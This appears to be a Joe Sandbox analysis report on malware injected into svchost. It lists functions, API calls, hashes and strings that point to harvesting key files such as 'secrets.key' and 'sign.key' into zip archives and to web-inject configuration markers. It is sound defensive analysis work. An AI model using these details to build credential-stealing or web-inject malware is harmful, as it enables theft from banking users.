                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8233dde59193e1d0be8b60998d85175095778d30159eae7e9dd8f1d15148535
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CF1EC75E102199FCB00DFA8C884A9EBBB9FF88710F15815AE914BB351D774AD41CF94
                                                                                                                                                                                                                Function 02BB1000 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 155memorythreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02BB148C,00000000,?), ref: 02BB101B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000013,7556F570,?,02BB148C,00000000,?), ref: 02BB103E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1045
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB1055
                                                                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7556F570,?,02BB148C,00000000,?), ref: 02BB1073
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02BB148C,00000000,?), ref: 02BB1093
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD0810,00000000,00000000,00000000), ref: 02BB10B9
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,\secrets.key,?,02BB148C,00000000,?), ref: 02BB10D5
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD20D0,00000000,00000000,00000000), ref: 02BB10E5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,sign.key,?,02BB148C,00000000,?), ref: 02BB10FD
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD2BB0,00000000,00000000,00000000), ref: 02BB1116
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?,?,02BB148C,00000000,?), ref: 02BB112A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB113B
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB1150
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1153
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,02BB148C,00000000,?), ref: 02BB115F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,02BB148C,00000000,?), ref: 02BB1162
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                                • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                                • API String ID: 3254303593-2345338882
                                                                                                                                                                                                                • Opcode ID: 94ac94a65b1485060b24576d2751fb54792aae1824d4a1c86f8f95d176430f02
                                                                                                                                                                                                                • Instruction ID: c8028fd78d668e3ac2aef66687c1a022bbf286838169bf84563a2e8ecb02e934
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94ac94a65b1485060b24576d2751fb54792aae1824d4a1c86f8f95d176430f02
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D41F4315512517AA7326A6A9C9CDFF7F3CEFC6FA0B904698FA19A3040E7A1C441C7B0
                                                                                                                                                                                                                Function 02BBE000 Relevance: 33.5, APIs: 17, Strings: 2, Instructions: 211synchronizationwindowtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: GetDesktopWindow.USER32 ref: 02BBDF8E
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: RealChildWindowFromPoint.USER32(00000000,?,02BBE016,?,02BBA857,?,755730D0,?), ref: 02BBDF95
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: IsWindowVisible.USER32(00000000), ref: 02BBDFC1
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: GetParent.USER32(00000000), ref: 02BBDFC8
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: GetWindowLongA.USER32(00000000,000000EC), ref: 02BBDFD3
                                                                                                                                                                                                                  • Part of subcall function 02BBDF80: WindowFromPoint.USER32(755730D0,?,?,02BBE016,?,02BBA857,?,755730D0,?), ref: 02BBDFE8
                                                                                                                                                                                                                • RealChildWindowFromPoint.USER32(00000000,?,02BBA857,?,02BBA857,?,755730D0,?), ref: 02BBE037
                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,?), ref: 02BBE05D
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBE081
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE092
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE09D
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE0BB
                                                                                                                                                                                                                • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE0C6
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BBA857), ref: 02BBE0D2
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002), ref: 02BBE0E6
                                                                                                                                                                                                                • GetWindowInfo.USER32(?,?), ref: 02BBE129
                                                                                                                                                                                                                • PtInRect.USER32(?,?,02BBA857), ref: 02BBE154
                                                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE174
                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,000000FF), ref: 02BBE1A3
                                                                                                                                                                                                                • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 02BBE1D0
                                                                                                                                                                                                                • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 02BBE1DB
                                                                                                                                                                                                                • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 02BBE1F7
                                                                                                                                                                                                                • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 02BBE202
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                                • String ID: <$P0Wu
                                                                                                                                                                                                                • API String ID: 1846550538-3435678627
                                                                                                                                                                                                                • Opcode ID: f29a0fcb686f15f1f78a2644fc8910dde4f18d17753442432f82e1c17429a30a
                                                                                                                                                                                                                • Instruction ID: dd6f3879b824cae557e6583da18cae66bfe836aafebf5e7a629c8626d2205653
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f29a0fcb686f15f1f78a2644fc8910dde4f18d17753442432f82e1c17429a30a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2F61AE75A40209ABDB21CE58DC84EFE73A9EF84761F544659FE50A3294CBB0EC11CBA0
                                                                                                                                                                                                                Function 02BD10C0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 192memoryfilestringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D70E0,?,76C0BF00), ref: 02BD10F0
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,76C0BF00), ref: 02BD1131
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,76C0BF00), ref: 02BD113B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD1143
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1154
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,76C0BF00), ref: 02BD115B
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02BD119A
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,76C0BF00), ref: 02BD11A7
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,76C0BF00), ref: 02BD11F0
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,76C0BF00), ref: 02BD120C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104,?,76C0BF00), ref: 02BD1229
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000008,00004070,75570F00,00000000,75572F00,?,02BC3CE8,?), ref: 02BD9793
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: RtlAllocateHeap.NTDLL(00000000,?,02BC3CE8,?), ref: 02BD9796
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: memset.MSVCRT ref: 02BD97AB
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: CreateFileA.KERNEL32(02BC3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02BC3CE8,?), ref: 02BD9802
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9825
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: HeapValidate.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9828
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9834
                                                                                                                                                                                                                  • Part of subcall function 02BD9780: HeapFree.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9837
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,76C0BF00), ref: 02BD1258
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D70E0,?,76C0BF00), ref: 02BD1277
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,76C0BF00), ref: 02BD12DB
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,76C0BF00), ref: 02BD12E8
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75572F00), ref: 02BD9991
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                                  • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$FreePathProcess$AllocAttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminAllocateCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                                • String ID: 617D70E0$\$inter.zip$path.txt
                                                                                                                                                                                                                • API String ID: 3271220685-2935460956
                                                                                                                                                                                                                • Opcode ID: 1f228519e9ce739a249fb4622c1f1dc0bd30849bf9f2ed11b10f959ffc6bbd4f
                                                                                                                                                                                                                • Instruction ID: 23af6302e15f28dbf6c2c5b1f70058be5e5aadc89648a2471b07cf1a8891578c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1f228519e9ce739a249fb4622c1f1dc0bd30849bf9f2ed11b10f959ffc6bbd4f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E61477094070A5FDB25CB789898BEB7BE8EF45340F4445D4EACDD7241EB71AA88CB90
                                                                                                                                                                                                                Function 02BD28F0 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752,?,?,00000000), ref: 02BD2920
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02BD2961
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 02BD296B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2973
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD2984
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 02BD298B
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD29BF
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 02BD29CC
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02BD2A10
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02BD2A2C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD2A49
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                                • String ID: 617D7752$\$path.txt$rfk.zip
                                                                                                                                                                                                                • API String ID: 3351314726-451692846
                                                                                                                                                                                                                • Opcode ID: 778e3f09270b10924505d1e57674a1718a89fee11edf5736d3a37cdb7b4da3af
                                                                                                                                                                                                                • Instruction ID: 47628c43ae8e57af4e52fb445ac3493624071d6c6f7fd10827fe8323f503aee1
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 778e3f09270b10924505d1e57674a1718a89fee11edf5736d3a37cdb7b4da3af
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 656148309006995FDB358B349C98BFB7BE4EF45340F4445E4EAC9D7242EB70AA88CB90
                                                                                                                                                                                                                Function 02BC1320 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(02BFFB20,00000000,00000000,00000000,?,02BC1A39), ref: 02BC1330
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020,?,02BC1A39), ref: 02BC1398
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,02BC1A39), ref: 02BC139F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC141F
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC1439
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC1453
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC146D
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC1497
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000020), ref: 02BC14B4
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 02BC14BB
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC15E4
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC161C
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BC161F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC162C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BC162F
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(02BFFB20,?,02BC1A39), ref: 02BC163A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
                                                                                                                                                                                                                • String ID: data_after$data_before$data_end$data_inject$set_url
                                                                                                                                                                                                                • API String ID: 2387113551-2328515424
                                                                                                                                                                                                                • Opcode ID: 25ad26229560573ab04331fa448130a095fa6d6a71a835bc903d8b6be9739cdd
                                                                                                                                                                                                                • Instruction ID: 175eff3abbedf8bcc87e91a6b51b60f50b498e2faab170de4acc5268710be294
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25ad26229560573ab04331fa448130a095fa6d6a71a835bc903d8b6be9739cdd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6EA1CE71A047019FDB21CF3884987A67FE1EF45348F2885EDD98A9B643EB71D609CB90
                                                                                                                                                                                                                Function 02BD38F0 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 189memorystringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3920
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3961
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD396B
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD3973
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3984
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD398B
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BD39BF
                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 02BD39CC
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3A10
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BD3A2C
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BD3A49
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                                • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                                • API String ID: 3351314726-487659054
                                                                                                                                                                                                                • Opcode ID: 50d78aee7ed85f65595c3bef02fc9011bac002a1835ea2f3ab3dde42b6dad8fc
                                                                                                                                                                                                                • Instruction ID: bacdf51a1bca5e723375b89948e123e0ca4badadaf01c31f2442603daf70966f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 50d78aee7ed85f65595c3bef02fc9011bac002a1835ea2f3ab3dde42b6dad8fc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63612570A006595FDB25CB349898BEB7BE4EF45340F5445D4EACAD7242EB70A988CF90
                                                                                                                                                                                                                Function 02BCB1D0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 189memoryfilestringCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCB1F0
                                                                                                                                                                                                                  • Part of subcall function 02BCB110: PathAddBackslashA.SHLWAPI(617D73CA), ref: 02BCB137
                                                                                                                                                                                                                  • Part of subcall function 02BCB110: GetFileAttributesA.KERNEL32(?), ref: 02BCB175
                                                                                                                                                                                                                  • Part of subcall function 02BCB110: PathFileExistsA.SHLWAPI(?), ref: 02BCB1B9
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA), ref: 02BCB238
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCB2A0
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 02BCB2AD
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA,?,?), ref: 02BCB2E7
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCB36A
                                                                                                                                                                                                                • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BCB37E
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BCB391
                                                                                                                                                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02BCB3C0
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73CA), ref: 02BCB3CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3EE
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 02BCB3F1
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3FE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 02BCB401
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                                • String ID: 5NT$617D73CA$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 2685098104-302677734
                                                                                                                                                                                                                • Opcode ID: 79993ac35a57e9465d0f4b5b6279272db1dde43e07cd28fd9a5a12e4c5e5c1c8
                                                                                                                                                                                                                • Instruction ID: 900c11c1b4498eb715a66454ce6496371e5f9c365f5fa493206f73847911ce43
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79993ac35a57e9465d0f4b5b6279272db1dde43e07cd28fd9a5a12e4c5e5c1c8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 465138709407495FDB218B389899FEF7FE8EF45348F2486D8EA85DB241DB719848CB90
                                                                                                                                                                                                                Function 00401150 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 133memoryfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401285
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                                • String ID: G,@
                                                                                                                                                                                                                • API String ID: 132362422-3313068137
                                                                                                                                                                                                                • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                                • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
